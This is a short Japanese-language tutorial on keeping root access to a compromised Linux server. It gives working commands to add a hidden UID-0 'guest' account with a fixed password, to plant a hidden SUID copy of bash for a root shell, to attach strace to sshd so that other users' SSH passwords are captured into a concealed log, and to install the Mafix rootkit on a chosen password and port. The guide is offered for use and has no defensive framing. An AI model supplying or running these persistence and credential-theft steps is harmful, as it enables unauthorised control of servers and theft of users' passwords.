Linux 権限の維持方法
1. スーパーユーザーの作成
例えば:
ユーザー名guest、パスワード123456でrootユーザーを作成します。
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test
以下を変更して/etc/passwd
スーパーユーザーを作成することもできます。
2. SUIDバックドア権限のメンテナンス
SUID バックドアの必要条件:
- SUID 権限はバイナリ プログラムに対してのみ有効です
- 実行者は、このプログラムに対する実行権限を持っている必要があります
- 権限はプログラムの実行中にのみ有効です
- 実行プロセス中、実行者はプログラム所有者の権限を持ちます。
ステップ:
- SUIDファイルを作成します。
.long
- バッシュを書く
cp /bin/bash .long #将bash命令cp到.long二进制程序中
chmod 4755 .long #赋予SUID文件的权限
- この SUID バックドア ファイルを実行します
./.long -p
ルートシェルを取得する
3.Strace はバックドアを監視します
strace は、他のユーザーを監視して接続できるだけでなく、他のユーザーのパスワードを捕捉するためにも使用できます。
まず、次のコマンドを使用して sshd プロセスの PID を見つける必要があります。
ps -ef | grep sshd
PIDは31171です
次に、次のコードを実行してトラフィックの取得を開始します。
strace -f -p 31171 -o .ssh.log -e trace=read,write,connect -s 2048
このとき、ssh でのログインやユーザーの切り替えなどの操作を行うと、パスワードがファイルに記録されることになりますが、.ssh.log
生成されるログ ファイルが非常に大きくなり、疑惑を抱かれやすいという欠点があります。
4.ルーキットバックドア
Mafix はよく使われる軽量のアプリケーションレベルのルートキットで、ssh プロトコルの脆弱性を突いてリモートログインを実現し、シンプルな構成とカスタマイズ可能な認証パスワードとポート番号が特徴です。
まず Mafix をダウンロードし、ターゲット サーバーにアップロードし、解凍して Mafix ディレクトリに移動し、ルートキットをインストールします。
./root 111111 7777
このうち、111111はバックドアプログラムに接続する際のパスワード、7777は接続ポートです
接続バックドア:
ssh ip -p 777